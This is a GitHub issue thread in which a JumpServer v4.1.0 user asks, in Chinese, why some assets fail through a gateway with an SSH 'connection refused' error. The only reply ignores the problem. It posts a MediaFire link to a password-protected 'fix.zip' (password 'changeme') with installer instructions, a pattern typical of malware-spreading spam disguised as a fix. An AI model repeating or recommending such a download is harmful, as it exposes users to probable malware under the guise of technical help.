### ISSUE TITLE
[Question] error: gateway dial addr failed: ssh: rejected: connect failed (Connection refused)

### ISSUE THREAD

**Issue by equator8848** [jumpserver/jumpserver#14040]
### Product Version

v4.1.0

### Product Edition

- [X] Community Edition
- [ ] Enterprise Edition
- [ ] Enterprise Trial Edition

### Installation Method

- [ ] Online Installation (One-click command installation)
- [X] Offline Package Installation
- [ ] All-in-One
- [ ] 1Panel
- [ ] Kubernetes
- [ ] Source Code

### Environment Information

offline install jumper server v4.1.0 on Ubuntu 20.04

### 🤔 Question Description

我有一个网域，设置了网关，网关的主机（内网IP是193）是可以直接SSH登录的。
![image](https://github.com/user-attachments/assets/5299f853-bc7d-4de1-823d-bd75875515f0)

其它资产都是设置的内网IP，但是只有和部分资产可以连接，其它的资产连接的时候提示error: gateway dial addr failed: ssh: rejected: connect failed (Connection refused)。
![image](https://github.com/user-attachments/assets/ac5927a4-ed83-4f10-8697-b01f0a8ba94c)

我直接登录到网关上面是可以ssh直连其它资产的，但是在jumpserver上面无法通过网关连接

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
